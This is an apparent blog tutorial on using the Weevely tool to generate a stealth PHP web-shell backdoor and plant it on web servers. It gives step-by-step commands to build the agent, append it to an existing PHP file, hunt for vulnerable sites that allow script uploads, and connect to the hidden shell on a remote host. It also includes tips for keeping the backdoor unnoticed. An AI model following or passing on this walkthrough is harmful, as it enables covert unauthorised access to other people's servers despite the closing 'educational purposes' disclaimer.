A backdoor is basically a method, which is often kept secret, of bypassing the regular system authentication and providing the programmer of the backdoor a quicker access to the end-point. Backdoors can be added in a variety of ways and with the help of various tools. One such tool is Weevely.
Weevely stimulates telnet – like connection and is a stealth PHP web shell. Although it is basically used for web application post exploitation, it can also be used as stealth backdoor or as a web shell to manage free hosted accounts or even manage legit web connections. It also conatins a lot of modules for administration and maintenance needs. What Weevely will do here, is it will allow remote code actions via a footprint PHP agent.
The First Step Would Be To Download & Install Weevely
This step can obviously be skipped if you are on a Linux Distribution that already contains Weevely. If, however, you are not on one such distribution, you can head over to this GitHub page. There are many ways to get Weevely on your distro.You can easily find the Git file here, or download via HTTP in your browser.
Creating The PHP Snippet
Head over to the folder containing master.zip and open a terminal window there. As an example, run the following commands:
cd Downloads [Assuming you have your master.zip inside your Downloads folder, we will be heading over to it]
unzip weevely3-master.zip [Let's unzip the file]
cd weevely3-master/ [Let's jump into the foler's location that has been unzipped]
ls [A quick listing to check out the files]
./weevely.py [To get a fair idea of what's what]
You might now, after running that command, be able to see the ‘Generate backdoor agent’ option. It contains a format right beneath it, which suggests that we would have to create a password, as well as a file name. For the sake of this article, let’s set ‘tcf’ as our password and call our file bckdor.php. You should now end up with a file called bckdor.php in the same directory you’re working in. Now run the following command:
weevely.py generate tcf bckdor.php
Remember to replace ‘tcf’ with the password you chose and ‘bckdor.php’ with the file name you chose in the above command. Also, let’s ignore my terrible naming skills. You might want to use less obvious names.
Slipping The Backdoor In
Now that we have our brand new PHP script, that is bckdor.php, we can now go ahead and put it to use, but first, you should past the contents of bckdor.php to another PHP file on your server which is accessible. Just copy the entire contents of bckdor.php below the contents of the other PHP file on your server.
Although I’m pretty sure you might already have done this, but at this point, you might want to search for a website that lets you share files or images, basically, a vulnerable website. All the best finding a website that lets you upload scripts.
The ultimate goal here is to somehow get the PHP file of yours, or atleast the contents of it, into some other PHP file on any server- local or remote.
Time To Access That Backdoor
One great thing about Weevely is that the PHP file running in the web directory doesn’t show anything in your web browser, because if it were showing anything, someone else would be able to discover or exploit it before you do. Now, if you have successfully completed the steps before this, you want to open weevely.py again and target the file.
For the local server: ./weevely.py http://localhost/settings.php tcf [You can see that I used the settings.php file]
For the remote server: ./weevely.py http://nameofthewebsite.com/bckdor.php tcf
Now that you have reached this point, you might want to run :help to see what things you’re able to do already. As said before, Weevely has a lot of modules built-in.
What commands would you recommend next? If you have you looked around already, what did you find interesting the most? Do let us know through the comments.Have fun, but don’t get too overwhelmed with your newly-found power.
[It should be noted that this post is purely for educational purposes]